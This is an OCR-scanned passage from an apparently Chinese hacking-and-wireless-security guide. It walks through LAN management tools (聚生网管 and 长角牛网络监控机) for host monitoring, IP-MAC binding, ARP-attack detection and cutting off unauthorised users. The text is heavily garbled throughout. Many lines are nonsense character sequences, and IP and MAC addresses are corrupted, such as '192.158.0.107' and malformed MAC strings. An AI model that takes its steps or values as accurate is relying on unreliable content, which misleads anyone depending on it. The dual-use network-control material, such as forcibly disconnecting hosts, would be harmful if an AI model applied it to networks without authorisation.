口 村 192168.0.105 -- E0:DD:C0:C0:1A:5D 
口 杜 192.168.0.101 -- , A4:44:D1:D3:48:7B 


VW 访问 |192.168.0.107 
2017-8-14 19:05:57 访问 192.158.0.107 eee bE | 1.82.232.12 
2017-8-14 19:05:57 访问 192.168.0.107 ene :F117.23.2.79 
2017-8-14 19:06:02 lo] 192.168.0.107 Es :F... 218.30.116.24 


口 显 192.168.0.100 -- . A4:5E:60:16.7AA1 
口 村 192.158.0.103 -- 。 ， 68:FB:7E:EA:FC:FA 


< 
时 间 类 型 Ipis 址 MACEtE 三 下 


不 下 王 六 详 六 他 愉 熔 就 作 会 厨 i 癌 实 版 各 座 闪 详 广 J] 开 害 秘 米 履 婴 必 这 作 昌 去, 疗 炉 宙 履 .… 大 半 认定 呈 司 内 字 搓 展 合 委培 办 展 疝 党 ， 功 训 展 革 所 WW 呈 上 民 定 古训 从 ,六 入 宙 愉 ... 
状态 : 监控 中 主机 所 数 : 12 在 续 :11 襄 竺 :1 


。 ve =- 一， 一 -一 一 


[sep 图 在 主机 列表 中 右 击 ， 在 弹出 的 快捷 菜单 中 选择 “控制 全 部 主机 ”菜单 命令 ， 即 可 控 
制 全 部 主机 ， 如 下 图 所 示 。 

[step 加 虽然 可 以 控制 全 部 主机 ， 但 只 是 让 用 户 查 看 带宽 ， 并 没有 对 主机 进行 其 他 的 控制 。 
如 果 想 启用 各 种 控制 (如 下 载 、 聊 天 等 ) ， 双 击 某 台 主机 信息 ， 即 可 弹出 “新 建 策略 ” 
消息 框 ， 将 看 到 “您 已 经 定义 过 策略 ， 现 在 继续 新 建 一 个 策略 吗 ? ”对 话 框 ， 如 下 图 
所 示 。 
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[see 加 如 果 想 对 所 有 的 主机 或 者 一 部 分 主机 
pape 一 个 策略 ， 要 在 “ 聚 生 网 管 ” 主 
机 列表 窗 格 中 右 击 ， 在 弹出 的 快捷 菜单 中 
选择 “批量 指派 策略 ”菜单 命令 ， 如 下 图 
所 示 。 


1p 坨 址 ( 汀 多 近 间 ) 主机 仿 ( 志 击 修改 ) (总 ) 上 行 (0,04 KB/S) (总) 开 | 
Di 168.0.104 4 控制 折 004 0,12 
口 矶 192.168.0.106 上 坊 租 当前 笔 醇 (P) 
器] 杜 192.168.0.107 | 为 话 二 主机 搭 斌 千 略 [IN) 

发送 Windows 信 位 尘 写 (G6) 

查 震 三 机 详 线 访 译 告 豆 中 

理 知 主机 详 纯 污 译 舍 昌 -已 搓 去 

仁 改 主 礼 这 上 阴 (M) 

至 生 主 机 人 


打开 “策略 指派 设置 ”对 话 框 ， 左 右 
到 他 分 别 为 已经 指派 和 中 的 主机 和 守 蕴 

策略 的 主机 ， 用 户 可 以 把 其 中 的 一 个 已 经 
建立 好 策略 的 组 或 未 建立 策略 的 组 里 面 的 
所 有 主机 ， 全 部 指派 到 右 侧 的 某 个 策略 组 
里 面 或 未 指派 的 策略 组 里 面 ; 右 侧 的 同样 
也 可 以 指派 到 左 侧 的 组 里 面 ， 如 下 图 所 示 。 


第 咯 措 白 设 畦 x 
读 选 定 筑 略 ; 语 远 定 策 覆 : 
未 后 所 各 除 ~ 局域网 
ip 弛 直 主人 二 lp 池 址 主机 所 
| 192.168.0.112 AFOIG-611211054 
二 < 适中 | 19z1680106 DESKTOp-5CVBNGI 
全 部 >> 192.168.0.107 DESKTOP-D5KF15E 
po 192.168.0.109 
192.168.0.114 AFOIG-702111221 
197.168.0.107 
192.168.0.105 
192.168.0.101 
122 alog 号 


> 


注 : 一 般 在 左边 下 拉 礁 内 逻 择 “未 演 派 过 跑 ”， 则 呈 示 所 有 未 操 派 策 缆 的 主机 ， 优 后 在 大 边 的 


Ep 
建 的 策略 ,然后 可 以 在 左边 框 户 按 性 SHIFT 刍 运 择 节 分 或 者 全 芝士 机 ， 然后 各 中 同 的 “ 先 中 ”或 阁 “ 全 部 ”， 则 这 些 未 操 派 
策 脆 的 主机 二 档 容 一 次 人 性感 于 你 刚 可 亨 奸 的 策 路 。 


在 “ 聚 生 网 管 ” 主 窗口 中 ， 单 击 “ 安 
全 防御 ”按钮 ， 在 弹出 的 下 拉 列 表 中 选择 
“IP-MAC 绑 定 ” 选 项 ， 打 开 “IP-MAC 绑 
定 ” 对 话 框 ， 在 其 中 可 以 设置 IP-MAC 绑 定 ， 
如 下 图 所 示 。 


IP-MAC 宗 十 X 


回 局 用 Ip-MAC 培 址 沉 定 
注 ; 在 启用 此 功能 之 前 诗 确 保 后 域 殉 的 电脑 没有 在 路 由 各 。 防火 治 肠 吉文 择 机 他 PP-MAC 迪 
走 ， 如果 已 法 二 法 下 沾 . 然后 月 此 尝 十 功能 , 否则 右 可 总 SB 和 响 后 域 网 网 阁 短 讶 ! 


主机 各 Ip 池 址 MAC 地 址 主机 ,说 和 


导出 IP-MAC 么 | 
导入 IP-MAC 守 | 


只 导出 MIAC 专 | 


口 乌 动 党 现 走 主 机 并 进行 窜 定 
口 改 现 非 法 IP-MAC 闭 定时 ,发送 酚 止 水 上 | 为 了 网 妆 安 全 ， 诗 不 亚 吾 宝 修 改 ]P ,你 的 阮 认 IP 为 %src， 诸 再 次 烙 改 为 哑 


客观 站 法 IP-MAC 和 证 31 ,新 十 法 证 们 从 网 这 村 
Spa | 
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单 击 “ 获 取 IP-MAC 关 系 ” 按 钮 ， 即 
可 在 左 侧 的 窗 格 中 显示 获取 的 I[P-MAC 关 
系列 表 信 息 ， 然 后 通过 单 击 “手工 添加 绑 
定 ” 按 钮 进行 IP-MAC 关 系 的 绑 定 操作 ， 如 
下 图 所 示 。 


IP-MAC 尘 定 x 
回 言 有 IP-MAC 地 址 纯 定 


注 : 在 启用 此 功能 之 前 ， 诸 确信 后 域 网 的 电脑 汉 有 在 路 由 吕 、 防 火 拦 或 省 交 泡 机 做 过 IP-MAC 渤 
定 ， 如 到 已 纯 定 洁 峻 潜 . 然后 用 此 贿 定 功能 . 否则 记 可 能 时 响 局 城 网 网 络 力 通 ! 


主机 名 1P 地 址 MAC 地 址 主机 说 明 屠 取 IP-MAC 关 夭 
圆 AFOlG-611.， 192.168.0.112 CBxi0:00:9CCCD1 AFOIG-611211054 手工 汰 加 绑 定 
圆 DESKTOp-5..192.168.0.106 00:23:24:D9:B6:E5 DESKTOP-5CVB... 删除 迁 中 终 定 
圆 bDEsKTOpP-.， 192.168.0.107 58:FB:84:FB:58:10 DESKTOP-D5KF1... 

js 192.168.0.109 7O:E7:2C:D3:11:24 = 清二 1 宇 | 
辑 | 网 放 科 技 192.168.0.108 40:A5:EF:DEA9:D3 网 络 科 技 
圆 AFCIG-702.. 192.168.0.114 COCB:38:7D:AG6:0E AFOIG-702111221 导出 Ip-MAC 去 
男 | 一 192.108.0.102 84,BE:52;3B;17;01 -- 
国 |-- 192.168.0.105 EO:DD:CO:CO:1A:5D AEMAGE 
攻 192.168.0.101 A4.44:D1:D3:48:7B 

-- A B :5E:00:16:7A'A1 
加 | 192.168.0.100 A45E:60:16:7A:A RsSdMAc 志 
口 ] 振动 发 现 新 主机 并 运行 儿 定 


口 ] 败 现 在 法 |p-MAC 费 定时 ,发送 鞋 止 沼 息 | 为 了 网 络 安全 ， 请 不 要 随意 修改 |p， 你 的 默认 1P 为 X%src ,请 再 次 修 改 为 隆 


品 改 瑕 =E 法 IP-MAC 红 牢 对 , 新 开 读 于 机 公 网 许 柠 
| 


为 了 保证 无 线 局 域 网 的 安全 ， 防 止 
无 线 局 域 网 内 其 他 用 户 用 聚 生 网 管 扰 乱 无 
线 局 域 网 ， 该 工具 还 提供 了 防护 “网 内 其 
他 运行 记录 ”功能 ， 单 击 “ 安 全 防御 ” 按 
钮 ， 在 弹出 的 下 拉 列 表 中 选择 “网 内 其 他 
运行 记录 ”和 选项， 打开 “局 域 网 本 软件 运 
行 记录 ”对 话 框 ， 聚 生 网 管 的 正式 版 可 以 
强制 测试 版 、 试 用 版 的 聚 生 网 管 退出 ， 并 
且 记 录 下 运行 聚 生 网 管 的 主机 的 机 器 名 、 
运行 时 间 、 网 卡 、IP， 以 及 系统 对 其 处 理 结 
果 等 信息 ， 如 下 图 所 示 。 


圆 所 RI# 软 H 运 ia 录 x 
局 域 网 内 其 他 主机 运行 本 软件 发 现 记录 回 强制 试用 版 退出 | 
时 间 IP 地 址 主机 名 网 卡 地 址 处 理 结果 

< py 


域 网 危害 最 为 严重 的 三 大 工具 无 线 局 域 


ie 


二 黑客 攻防 与 无 线 受 全 从 新 手 到 高 手 ( 超 值 版 ) 


网 终结 者 、 网 络 剪刀 手 和 网 络 执法 官 。 在 
“ 聚 生 网 管 ” 主 窗口 中 单 击 “ 安 全 防御 ” 
按钮 ， 在 弹出 的 下 拉 列 表 中 选择 “安全 监 
测 工具 ”选项 ， 打 开 “ 安 全 监测 工具 ”对 
话 框 ， 在 其 中 即 可 看 到 局 域 网 攻击 检测 工 
具 和 和 局域网 ARP 病 毒 、ARP 攻 击 专项 检测 工 
具 等 ， 如 下 图 所 示 。 

辆 安全 监测 工具 xX 


一 、 局 域 网 混杂 模式 节点 检测 工具 
本 工具 可 以 检测 局 域 网 内 网 卡 处 于 混杂 异 式 的 节点 ， 以 发 现 嗅 探 软 件 或 其 他 网 管 类 软件 


FW | 
二 、 局 域 网 攻 去 检测 工具 
系统 可 以 检测 当前 局 域 网 三 大 工具 软件 : 局 域 网 终结 者 、 网 络 茵 刀 手 、 网 络 执法 官 
eeW | 


、 局 域 网 ARP 病 毒 、ARP 攻 击 专 项 检测 醋 具 


(建议 不 起 过 10) 

口 启用 局 域 网 ARP 攻 去 防御 功能 
言 动向 局 域 网 发 送 ARP 攻 二 免疫 信息 
检测 到 ARPp 攻 去 时 ， 自 动 加 大 免疫 力度 0 
检测 到 ARP 攻 去 时 记录 危险 主机 

ARP 攻 击 记 史记 录 : 
时 间 IP 地 址 主机 名 网 卡 地 址 i 
< a 


单 击 “ 局 域 网 攻击 检测 工具 ”栏目 中 
的 “开始 检测 ”按钮 ， 即 可 打开 “局 域 网 
攻击 软件 检测 工具 ”对 话 框 ， 如 下 图 所 示 。 


开始 检测 


IF 地 址 检测 结果 


单 击 “ 开 始 检测 ”按钮 ， 即 可 打开 是 
否 使 控制 服务 处 于 停止 状态 提示 框 ， 如 下 图 
所 示 。 
重要 提示 
在 进行 攻击 工具 检测 时 聚 生 网 管控 制服 务必 须 和 暂时 停止 ， 


请 您 首先 停止 一 下 控制 服务 ， 等 检测 完 举 再 台新 启动 ! 


请 问 控制 服务 现在 是 处 于 停止 状态 吗 ? 
|| a 


[step 图 单 去 “是 ”按钮 ， 即 可 检测 整个 无 线 局 
域 网 中 是 否 存在 无 线 局 域 网 攻击 ， 同 时 将 检测 
的 结果 显示 在 下 面 的 列表 中 ， 如 下 图 所 示 。 


290 


局 刀 两 攻 寺 软 件 恰 列 工具 一 x 


tan 


Ipitoht 梯 沁 村 
jy 198 169.0 112 下 在 汪 二 


单 击 “ 聚 生 网 管 ” 窗 口中 的 “扩展 插 
件 ” 按 钮 打开“ 扩展 插件 ”对 话 框 ， 在 
其 中 即 可 看 到 聚 生 网 管 自 市 的 扩展 工具 ， 
如 下 图 所 示 。 


辆 扩 民 插件 x 


启动 聚 生 网 管 外 未 叫 脑 襄 动 控制 器 ( 仅 全 能 版 提供 | | 


聚 生 网 等 外 来 电 该 控 利 器 呈 大 垫 至 ( 北京 ) 就 件 工 程 有 有 限 公司 准 出 的 一 就 专门 月 于 防范 外 来 电 
脐 私 目 卫 入 到 公 可 内 部 局 城 网 中 访问 内 网 服务 赤 或 责 凶 电 用 的 共享 资源 . 杜 汉 绩 专 传 获 的 一 顽 

内 了 网 安 全 管 还 荆 呈 。 丰 了 只 可 以 避 内 网 服务 器 或 其 他 主机， 同时 也 可 >j 莹 
止 内 网 电脑 主动 注 接 外 深 电 脑 ， 并 可 以 记录 外 六 电脑 的 |pP、MAC 地 址 等 情 部 ， 从 而 可 以 三 车 
生 了 网 管 系统 一 起 帮 针 了 网管 人 员 吏 好 卸 加 织 内 网 管 短 、 防 范 风险 ， 


局 动 译 生 风 管 主机 异 案 穴 报 工具 ( 仅 全 能 棣 提供 ) ] 


pe ee ee [ 谅 ) 软 件 工程 有 限 公 司 推出 的 一 康 匀 对 局 城 网. 
网 关键 服 务 茵 ， 工 作 站 或 其 亿 特殊 主机 的 实时 信 测 工 县 -通过 It 莽 报 工具 . 可 以 在 被 监 

ER 通过 也 件 、 手机 拓 信 ( 宇 径 信 设 各 二 持 ) 等 

便于 管理 员 肥 时 乎 取 措施 进行 规 塌 和 修复 ， 


网 答 局 域 网 主机 噶 千 和 敬 把 工具 作为 蒜 生 网 
网 络 行为 监 皖 功 能 ， 进 一 步 深 化 了 网 络 管理 。 


a | 
局 动 慰 生 网 管 代理 服务 露 扫 : 


代 班 扫 痊 器 全 大 势 至 [北京 ) 玫 件 工程 有 限 公 司 准 出 的 一 教 扫 疙 局 城 网 内 部 代理 扳 务 绑 的 工具 ， 
可 以 避免 局 域 网 内 部 趟 脑 充当 代理 饮 务 器 或 者 通过 代 玛 服务 磊 上 网 而 引发 的 网 阁 安 宇 癌 题 ; 
代理 扫 搬 箭 与 舍 生 网 管 系 坑 的 有 效 碟 合 ,可 以 为 企 事业 单位 内 部 后 域 网 控 供 全 方位 的 网 路 监 
控 、 安 全 防护 功能 | 


局 动 友 生 网 管 网 卡 总 淋 模式 检 测 工具 ( 仪 全 雍 版 迫 供 ) 
票 生 网 管 网 卡 小 杂 昼 式 检 测 械 具 征 大 劳 至 (北京 } 软件 工程 有 限 公司 开发 的 一 款 专 门 检 测 局 域 


网 内 处 于 属 未 榨 式 网 卡 的 电 护 ， 从 而 可 以 防止 内 网 电脑 私自 去 法 网 管 坎 件 ， 防 止 去 凌 Sniffer 唱 
探 软件 、 防 止 去 装 wireshark 娘 探 钦 件 等 ， 从 而 更 好 地 保护 内 网 的 网 络 辫 宇和 商业 机 刻 。 


启动 可 生 网 答 远 径 管 滩 荆 县 ( 仅 全 兹 版 提供 
桶 生 网 管 远程 管理 技术 ( Remote Management Technology , 简称 RMIT ) 呈 一 浆 守 对 后 域 
网 的 写 规 管理 工 上 号 . 遍 过 RMT ， ine er 不 宇 茹 什 到 性 大 安 蔚 
任何 软件 ,网管 人 吕 可 以 守 现 对 卢 域 网 蛤 对 ( 争 个 或 省 批 县 ) 进行 远程 开机 、 远 程 关 机 .远程 
到 局、 远程 注 缘 等 笃 作 ,方便 了 内 赔 管 理 。RMTw1 ea 三 要 生 网 敬一 
起 服务 于 企业 的 网 洛 管理 。 


在 “ 聚 生 网 管 ” 主 窗口 中 ， 单 击 “ 全 局 
避 轩 ”入 和 ， 即 可 打开 “运行 没 和 ”对 洛 检 
在 “系统 设置 ”选项 下 可 以 对 软件 启动 、 攻 
盘 图 标 、 呼 出 热 键 、 密 码 保护 、 软 件 CPU 占 用 
设置 等 属性 进行 相应 的 设置 ， 如 下 图 所 示 。 


图 运行 设 妓 x 
系统 设置 ”优先 级 设置 
软件 局 动 没 富 
Language Select: |Chinese v 
口 电 腋 启动 时 自动 运行 ”软件 运行 有 转 为 注 制 状态 
账号 设 囊 | [| 室 认 便 用 上 次 账号 窜 录 
口 监控 意外 中 断 时 言 动 至 新 加 就 - 至 启 软件 生效 
口 软件 运行 一 段 灶 间 后 自动 释放 和 内存 EN 3 
口 定时 启动 关机 |18 读 | = [0 


小 时 重启 软件 生效 
| 分 --- 至 启 生效 


监 六 十 打量 新 可 问 | 。 5| 私 必要 强度 : [50 (建议 不 要 33id50) 
回 记录 日 志 到 数据 库 ， 并 且 当 日 志 达 到 | 500 | M 革 二 动 入 份 并 创建 新 的 数据 库 。 
托盘 到 标 滩 墅 。 一 | 
器 软 件 隐 芝 运行 --- 暑 认 吹 出 热 猎 ; ALT + F1 
团 议 部 任务 栏 王 示 调 低 
呼出 抽调 没 野 
请 您 在 右 山 古 十 按 下 地 。 | 无 
口 噶 出 时 密码 尿 护 
口 程序 关闭 时 密码 保护 。”【( 注 : 默认 噶 出 执 键 : ALT+F1 ) 
口 开 启 远 程 吾 启 功能 ”至 启 密 码 : 再 和 输入 密码 : | | 
实时 流量 加 受 大 克 度 值 识 置 。 500K ~ 
软件 运行 CPU 点 用 没 证 “| 效率 十 (CPU 占 用 二 ) | ( 重启 监控 生效 ) 
| 


[sep 图 选择 “优先 级 设置 ”选项 卡 ， 在 其 
中 即 可 对 软件 进行 优先 级 设置 ， 设 置 完 毕 
后 ， 单 击 “ 保 存 设 置 ” 按钮 即 可 ， 如 下 图 
所 示 。 


RPR | 


14.4.2 ”长 角 牛 网 络 监 控 机 


长 角 牛 网 络 监 控 机 《网 络 执法 官 ) 只 
须 在 一 台 机 右上 运行 ， 可 穿 透 防火 墙 ， 实 
时 监控 、 记 录 整 个 无 线 局 域 网 用 户 上 线 情 
况 ， 可 限制 各 用 户 上 线 时 所 用 的 P、 时 段 ， 
并 可 将 非法 用 户 踢 下 无 线 局 域 网 。 本 软件 
适用 范围 为 无 线 局 域 网 内 部 ， 不 能 对 网 关 
或 路 由 器 外 的 机 器 进行 监视 或 管理 ， 适 合 
无 线 局 域 网 管理 员 使 用 。 


1. 查看 主机 信息 


利用 该 工具 可 以 查看 无 线 局 域 网 中 
各 个 主机 的 信息 ， 例 如 用 户 属性 、 在 线 记 
录 、 记 录 碍 询 等 ， 其 具体 操作 步骤 如 下 : 
在 下 载 并 安装 “长 角 牛 网 络 监 控 
机 ”软件 之 后 ， 选 择 “ 开 始 ” 一 “所 有 应 
用 ”一 Netrobocop 菜 单项 ， 即 可 打开 “设置 
监控 范围 ”对 话 框 ， 如 下 图 所 示 。 
[step 图 在 设置 完 网 卡 、 子 网 、 扫 描 范围 等 属 
性 之 后 ， 单 击 “ 添 加 /修改 ”按钮 ， 即 可 将 
设置 的 扫描 范围 添加 到 “监控 如 下 子 网 及 IP 
段 ” 列表 中 ， 如 下 图 所 示 。 


图 运行 设 嘻 x 
系统 设置 ”优先 级 设 吾 
软件 优先 级 设计 
启用 网 络 应 用 优先 级 设 司 (QOS)] 
〇 已 四 全 局 白 名 单 设置 。 站 局 用 全 局 举人 名 单 设 早 
| 
多 除 | 
ee | 
导出 | 
导入 | 
口语 昨 基 于 协议 特征 的 优先 级 程序 转发 没 营 
QQ 传 立 件 
OOQ 营 图 
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设置 监控 范围 
设置 扫 指 了 于 网 /IF 段 一 一 
迁 接 网 卡 : |Atheros LI Gigsbit Ethernet 10/1007/1000Base-T Con ~ 
阿 卡 摘 术 : htheros Li Bizgabit Fthornot 1071DDZ1D0DBaso-T 
子 网 : [IF: 192. 168.0.104j24 [192.188.0.1 - 192.168.0.254] 


扫描 范围 :192.168.0.1 — [192. 168. 0.254 湛 加 /修改 | 
上 监控 如 下 子 网 及 IP 耻 : 


手工 操作 ， 取 消 自动 运行 


| TH 指 | 确 定 | | 退出 | 


设置 监控 范围 
设置 扫 措 子 网 /TF 息 一 
选择 陪 卡 : |Atheros LI Bigsbit Ethernet 10/1007/1000Base-T Con ~ 
阿 卡 摘 示 : htheros Li Bigabit Fthornot 1071DDZ1D0DBaso-T 
子 网 : [TF: 192. 168.0.104j24 [192.188.0.1 - 192.166.0.254]」 


扫 指 范围 : [192.168.0.1 -J192.168.0.254 添加 ffE 改 | 
遇 控 如 下 子 网 民 z 耻 


取消 自动 运行 


| 不 扫描 | 确定 wo 


[step 图 选中 刚 添 加 的 IP 段 后 ， 单 击 “ 确 定 ” 
按钮 ， 即 可 打开 “长 角 牛 网 络 监 控 机 ” 主 
窗口 ， 在 其 中 即 可 看 到 设置 IP 地 址 段 内 的 主 
机 的 各 种 信息 ， 例 如 网 卡 权限 地 址 、IP 地 
址 、 上 线 时 间 等 ， 如 下 图 所 示 。 


本 并 外 二 网 让 这 李 情 民用 额 v3.56 - OD Xx 
系 婉 fT 设置 [5】 四 户 [IU】 可 总 [Di 和 的 [H) 
Ea 园 4 有 用户 | 况 服 8 昨 到 | 晤 记 7 区 两 | 


ELE MT [EFE YET 用 户 | 上演 招 L Tt S 
i192 100.01 2047-09-46 937: 城 一 网 卡 生产 三 入 下 证 
上 0 WENA / IESKTF 2017-00-15 09.37; 奶 一 5 COTUTIR 
0 192 08.0 112 WR UP / 1060 2017-06-46 9.37: 城 一 网卡 和 产 厂 导 不 评 
| 492 169.0 107 份 【为 固 " 主 怕 器 ] 2047-06-45 [9 37 好 一 产 厂 案 趟 # 
时 ,we ee.0 1m 仇 一 2017-09-45 09.37;#7 一 同 直 生产 厂 耻 下 应 


Tox109 Udp;19 | 运 和 5 0%00'55" 这 网 二 本 将 全 05 黎 后 才 已 答 于 功 祝 ， 


[sep 园 在 “长 角 牛 网 络 监控 机 ”窗口 的 计算 
机 列表 中 双击 需要 查看 的 对 象 ， 即 可 打开 
“用 户 属性 ”对 话 框 ， 如 下 图 所 示 。 


用 户 届 性 x 
用户 本 
网 卡 地 址 后 


用 户 注释 EE 家 不 详 


| 保存 | 
rptt Naren 

组 /主机 ;用 户 WORKGEDUP /AFCOIG-611211054 x/ AFODIG-61121lC54 
首次 上线 [2017-00-15 09.37 后 00170015 093753 
末次 上 线 押 17F06-15 0937 6 -于 


图 历史 记录 | 仿 设置 权限 | 局 是 除 有 户 | | 关闭 | 
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单 击 “历史 记录 ”按钮 ， 即 可 打开 
“在 线 记 录 ” 对 话 框 ， 在 其 中 查看 该 计算 
机 上 线 情况 ， 如 下 图 所 示 。 


在 线 记 录 x 

用 户 : |c8-60-00-9C-CC-D1 [生产 厂家 :网 卡 生产 厂家 不 详 ] 
注 竹 : | 网 上 不 生 产 厂 家 不 

| 名 了 地 此 域 / 主机 /用户 上 续 时 间 

@ 1%.183 0.112 WORKSRDUP , AFDLG-611211054 2017-08-15 09: 37:46 

< 2 

之 次 ， 
下 和 次 因 国 寺村 导出 加 
关闭 


单 击 “ 导 出 ”按钮 ， 即 可 将 该 计算 机 
的 上 线 记 录 保 存 为 文本 文件 ， 如 下 图 所 示 。 


了 Tem5E93 - 记 京 本 一 口 XxX 
文件 (月 ”六 辑 (E) 枪 RIO) 坦 看 (V) 帮助 (H) 

长 角 牛 网 络 监控 机 用 户 上 线 记录 ， 建 六 于 2017-08-15 09:39:52 。 
有 
其 中 非法 0 次 时 于 关中 \ 时 0 分 人 


序号 , 是 否 合法 , IP, 组 /主机 /用 户 , 上线 时 间 , 下 线 时 间 , 下 线 原 因 


1, 年， 192. 168. 0. 112, WOREGFOUP # AFOIG-611211054 / MFOIG-6112 


[step 园 在 “长 角 牛 网 络 监控 机 ”窗口 中 单 
击 “ 记 录 查 询 ” 按 钮 ， 即 可 打开 “记录 查 
询 ” 究 口 ， 如 下 图 所 示 。 


持 统 [T 设 回 [S】 用 户 [U] 性 杷 ID 得 助人 H] 
全 国 本 网 用户 | 国 卫 务 此 加 三 记 予 百 间 | 


百村 对 

一 所 有 用 户 一 

DR: 一 所 有 用 户 一 | 
充 玛 茶 : 5 7 
组 /主机 /用 户 怪 外 合 : 


| 
"注释 "包含 : 


一 FE 255 255 255 


在 妊 时 间 : 12017-07-15 3 天 一 
一 [017-6-15 m3 5 之 


持 纺 在 线 ! 站 省 所 上 
下 水 医 因 : 厂 一 存 合 铅 因 一 | 
由 查找 户 导出 


月 疡 总 汶 :6 在 洲 5 砷 去 0 Tcp:92 Udp:19 运行 00:02'55" 试 月 版 本 将 在 27 分 神 语 入 来 基于 大 ， 


在 “用 户 ” 下 拉 列 表 中 选择 要 查询 用 
户 对 应 的 网 卡 地 址 ; 在 “在 线 时 间 ” 文 本 框 中 
设置 该 用 户 的 在 线 时 间 ， 然 后 单 击 “ 查 找 ” 
按钮 ， 即 可 找到 该 主机 在 指定 时 间 的 记录 ， 
如 下 图 所 示 。 
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| 轩 长 名 牛 网 洛 必 榨 抽 斌 忆 脾 v3.56 - ODO x 
系 娓 IT] 设置 [5] 所 户 [U】 涯 深 [Dj 媳 动 (H] 
各 本 n 术 机 | 圈 本 RR 户 | 国 四 省 到 网 记录 碰 济 | 
互 扰 对 名 oj 不 帘 允 主 
用 户 一 所 有 有 用户 一 341-17- 
可 耻 斯 有 周 户 


| | 7d-03 0 192.100.0.1 一 2017-00-15 09.37. 怒 
往 祥 包 癌 


让 

和 共 : 5 7 5 2017-08-15 09-37-: 杞 
狂 / 主 所 /用 己基 基 合 00-23-26-19-B6- 二 3 192 168.0 105 WORNSEDUP / DPSXTOF 2D1T-08-15 09:37: 柜 
切 


入 引 任 睹 :由 8 揽 上 
下 载 F 由 :| 一 在 系 折 同一 *| 
三 地 共 动 导出 
dR :站 绚 扯 " 


人 站 


用 户 兰 要 下 法 6 非法 0 Tcp:128 Udp:19 运行 /0423* 远 用 版 本 , 凋 在 25 分 钟 后 乱 厌 千 带 功能 ， 


[step 图 在 “长 角 牛 网 络 监 挖 机 ”窗口 中 单 击 
Er 选项 ， 即 可 打开 “本 机 状态 
言 息 ” 窗 口 。 在 其 中 即 可 看 到 本 计算 机 的 
网 卡 参数 、IP 收 发 、TCP 收 发 、UDP 收 发 等 
信息 ， 如 下 图 所 示 。 


长 角 咎 网 洛 鉴 控 机 过 后 本 v3.55 — 口 x 
大 4IT] 设 轩 [5】 月 户 IU] 菇 栋 iD]】 大 勋 [H) 
再 二 机 棱 访 | 加 本 癌 朋 户 | 国 服务 些 刊 | 匡 记 隶 查询 | 
屿 上传 总 TCTVUIT 堪 将 


ES 习 TCP 当 商 连 振 寺 : 142 
Mheros 11 Gigasbit Erhernet 101 田 We 监听 - 19 
田 TIP 亿 冯 
身 JCP 呈 发 
四 -ITDP 由 发 
党 下 使用 
用 户 兰 笋 4 在 法 0 非法 0 Top:142 Udp:19 运行 0040450" 试用 版 本 , 要 在 25 分 鲁 后 过 去 时 理 功能 。 


在 “长 角 牛 网 络 监控 机 ”窗口 中 单 
FY 二 测 ” 选 项 ， 即 可 打开 “服务 监 
测 ” 窗 口 ， 在 其 中 即 可 进行 服务 器 的 添 
加 、 修 改 、 删 除 等 操作 ， 如 下 图 所 示 。 


时 长 角 牛 网 洛 鉴 泻 机 试用 栈 v3.55 _ D x 
持 统 针 设 时 [S】 其 户 [U] 网 绾 iD] 磺 助 (HH 
砚 本 基态 | 园 二 R 用 户 过 秆 轨 由 | | 图 记 邓 百 日 | 


服务 营 添 加 共有 ! 十 服务 器 上 的 0 质 服 务 过 于 监 儿 1。 立 隐 以 党 3 半 


3 


服务 芝 修 洒 


用 户 兰 歼 6 在 堵 :6 非法 :0 Tcp:75 Udp:19 运行 00.06'S2" 试用 版 本 ， 榨 在 23 分 性 捕 地 平生 班 功 乃 . 


2. 设置 无 线 局 域 网 


除 收集 无 线 局 域 网 内 各 个 计算 机 的 信 
恩 之 外 ，“ 长 角 牛 网 络 监 控 机 ”工具 还 可 
以 对 无 线 局 域 网 中 的 各 个 计算 机 进行 网 络 
管理 ， 可 以 在 无 线 局 域 网 内 的 任 一 台 计 算 
机 上 安装 该 软件 ， 来 实现 对 整个 无 线 局 域 
网 内 的 计算 机 进行 管理 。 

其 具体 的 操作 步骤 如 下 : 
step 加 在 “长 角 牛 网 络 监控 机 ”窗口 中 选择 
“设置 ”一 “关键 主机 组 ”命令 项 ， 即 可 
打开 “关键 主机 组 设置 ”对 话 框 ， 在 “ 选 
择 关 键 主机 组 ”下 拉 框 中 选择 相应 的 主机 
组 ， 并 在 “组 名 称 ” 文 本 框 中 输入 相应 的 名 
称 之 后 ， 再 在 “组 内 IP” 列 表 框 中 输入 相应 
的 JP 组 。 最 后 单 击 “全 部 保存 ”按钮 ， 即 可 
完成 关键 主机 组 的 设置 操作 ， 如 下 图 所 示 。 


关键 主机 组 设置 xX 


选择 关键 主机 组 : | 对 本 本 ES 下 三 册 


组 名 称 : | 全 oup #1 


组 内 IF: 

1. I0.0.0.0 2, 40.0.0.0 3. 器 0.0.0 

4. |0.0.0.0 5. 0.0.0.0 6. |0.0.0.0 

?. |0.0.0.0 8. I0.0.0.0 9. jo.0.0.0 
10. |0.0.0.0 11， 10.0.0.0 二 .0.0.0 
13. |0.0.0.0 14. |0.0.0.0 15. |0.0.0.0 
16. I0.0.0.0 1?. 0.0.0.0 18., |0.0.0.0 

全 部 保存 | 取消 | 
日 二 。 《6 » | 和 甩 
何 提 示 : “关键 主机 组 ”是 由 管理 员 指 定 


的 J 了 地 址 ， 可 以 是 网 关 、 其 他 计算 机 或 服务 
器 等 。 管 理 员 将 指定 的 IP 存 入 “关键 主机 
组 ”之 后 ， 即 可 令 非 法 用 户 仅 断 开 与 “ 关 
键 主机 组 ”的 连接 而 不 断 开 与 其 他 计算 机 
的 连接 。 


在 “长 角 牛 网 络 监 控 机 ”窗口 中 选择 
ET “默认 权限 ”菜单 项 ， 即 可 打 
开 “ 用 户 权 限 设置 ”对 话 框 ， 选 择 “ 受 限 
用 户 ， 若 违反 以 下 权限 将 被 管理 ” 单 选 按 
钮 之 后 ， 设 置 “IP 限 制 ”“ 时 间 限 制 ” 和 
“组 /主机 /用 户 名 限制 ”等 。 这 样 当 目标 计 
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算 机 与 无 线 局 域 网 连接 时 ，“ 长 角 牛 网 络 
pope ”将 按照 设 定 的 选项 对 该 计算 机 进 
管理 ， 如 下 图 所 示 。 
用 户 权限 设置 xX 
设置 新 月 户 默认 要 限 。 


设置 权限 
全 自由 用 户 ， 与 网 络 连 接 不 爱 限 钊 。 
个 爱 限 用 户 ， 若 韦 民 以 下 权限 将 被 管理 。 


厂 超过 后“ 二] 天 未 上 线 则 设 为 禁止 用 户 
个 禁 目 用户， 发 现 该 用 户 上 线 即 管理。 
汗 违 区 以 上 可 限 的 用 户 ， 将 自动 接 以 下 方式 进行 管理 。 
频率 : | 9 ”| 
_ 关键 主机 组 | 
玛 感 主机 | 
| | mm] | 保存 | 取消 | 


芋 方 式 


